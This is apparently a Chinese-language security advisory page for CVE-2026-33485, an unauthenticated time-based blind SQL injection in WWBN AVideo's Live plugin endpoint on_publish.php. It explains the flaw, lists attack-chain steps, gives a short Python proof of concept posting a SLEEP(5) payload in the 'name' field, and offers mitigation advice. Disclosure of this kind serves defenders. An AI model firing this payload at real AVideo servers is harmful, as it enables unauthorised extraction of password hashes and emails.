CVE-2026-33485 CVSS 7.5 高危

CVE-2026-33485: AVideo远程SQL注入漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33485

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo开源视频平台在26.0及以下版本中存在高危SQL注入漏洞。由于`plugin/Live/on_publish.php`接口未启用认证且直接拼接用户输入，攻击者无需登录即可利用基于时间的盲注，窃取数据库中的敏感信息，如用户密码哈希和电子邮箱。

技术细节

该漏洞位于WWBN AVideo的Live插件中，具体文件为`plugin/Live/on_publish.php`。该文件负责处理RTMP流的发布回调，但未实施任何认证检查。漏洞根源在于`$_POST['name']`参数（即流密钥）被直接插入到SQL查询中，涉及`LiveTransmitionHistory::getLatest()`和`LiveTransmition::keyExists()`两个方法。由于代码未使用参数化查询或转义机制，攻击者可以通过发送包含恶意SQL负载的POST请求，利用基于时间的盲注技术。根据CVSS 3.1评分7.5，攻击者可在无交互、无认证的情况下通过网络提取数据库中的敏感数据，严重威胁系统机密性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统运行的是WWBN AVideo平台，且版本在26.0及以下。

STEP 2

2. 访问漏洞接口

攻击者向`plugin/Live/on_publish.php`端点发送HTTP POST请求，该接口无需认证即可访问。

STEP 3

3. 注入攻击payload

在POST请求的`name`参数中注入基于时间的盲注Payload（如`SLEEP(5)`），观察响应时间。

STEP 4

4. 数据提取

利用布尔逻辑或时间延迟逐位提取数据库内容，获取用户哈希、邮箱等敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

# Target URL
# Replace with the actual target URL
target_url = "http://example.com/plugin/Live/on_publish.php"

# Payload for time-based blind SQL injection
# This payload attempts to cause a delay of 5 seconds if the condition is true
payload = {
    "name": "' OR (SELECT SLEEP(5))-- -"
}

try:
    print("[*] Sending payload to target...")
    start_time = time.time()
    response = requests.post(target_url, data=payload, timeout=10)
    end_time = time.time()
    
    elapsed_time = end_time - start_time
    
    if elapsed_time >= 5:
        print(f"[+] Vulnerability confirmed! Response took {elapsed_time:.2f} seconds.")
    else:
        print(f"[-] Vulnerability not detected or patched. Response took {elapsed_time:.2f} seconds.")
        
except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

建议立即在Web服务器防火墙（如WAF）中添加规则，拦截对`on_publish.php`的异常请求，或通过网络访问控制列表（ACL）限制对该路径的访问，直至完成版本升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表